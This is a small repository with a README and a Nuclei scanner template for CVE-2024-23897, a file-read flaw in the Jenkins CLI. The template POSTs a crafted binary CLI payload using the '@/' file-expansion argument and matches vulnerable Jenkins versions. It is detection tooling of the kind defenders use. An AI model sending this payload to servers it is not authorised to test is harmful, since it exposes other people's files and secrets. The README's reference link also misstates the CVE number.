├── README.md
└── cve-2024-23897.yaml


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2024-23897 
 2 | > Nuclei Template For Exploit CVE-2024-23897 
 3 | 
 4 | This template serves as a crucial warning to all users if the CVE-2024-23897 local file vulnerability is detected within your system, it is imperative to take. immediate action and patch your systems without delay. This vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data
 5 | 
 6 | The templates main purpose is to check if the Jenkins version is exploitable. 
 7 | 
 8 | Usage:
 9 | ```
10 | nuclei -t cve-2024-23897.yaml -u http://127.0.0.1:8080 
11 | ```
12 | 
13 | ![image](https://github.com/kaanatmacaa/CVE-2024-23897/assets/57772940/9e9a5777-6a67-461c-b3a4-b779ffb48b1c)
14 | 
15 | 
16 | Installation: 
17 | ```
18 | git clone https://github.com/kaanatmacaa/CVE-2024-23897.git
19 | sudo mv /CVE-2024-23897/cve-2024-23897.yaml /root/nuclei-templates
20 | ```
21 | 
22 | 
23 | Note: 
24 | Create issue for new ideas 
25 | 
26 | > Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-23879
27 | 


--------------------------------------------------------------------------------
/cve-2024-23897.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2024-23897
 2 | 
 3 | info:
 4 |   name: Jenkins LFI Vulnerability CVE-2024-23897
 5 |   author: katmaca
 6 |   severity: high
 7 |   description: This template serves as a crucial warning to all users if the CVE-2024-23897 local file vulnerability is detected within your system, it is imperative to take immediate action and patch your systems without delay. This vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data
 8 |   reference:
 9 |     - https://nvd.nist.gov/vuln/detail/CVE-2024-23897
10 |   classification:
11 |     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
12 |     cvss-score: 7.5
13 |     cve-id: CVE-2024-23897
14 | 
15 | variables:
16 |   payload: "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
17 | 
18 | http:
19 |   - method: POST
20 |     path:
21 |       - "{{BaseURL}}/cli?remoting=false"
22 |     headers:
23 |       Side: upload
24 |       Session: b442300c-63e4-45c9-8011-6555a78331ee
25 |       Content-Type: application/octet-stream
26 |     body: "{{payload}}"
27 |     matchers:
28 |       - type: regex
29 |         regex: 
30 |           - Jenkins ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))
31 |       - type: regex
32 |         part: header
33 |         regex: 
34 |           - X-Jenkins[:] ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))
35 | 


--------------------------------------------------------------------------------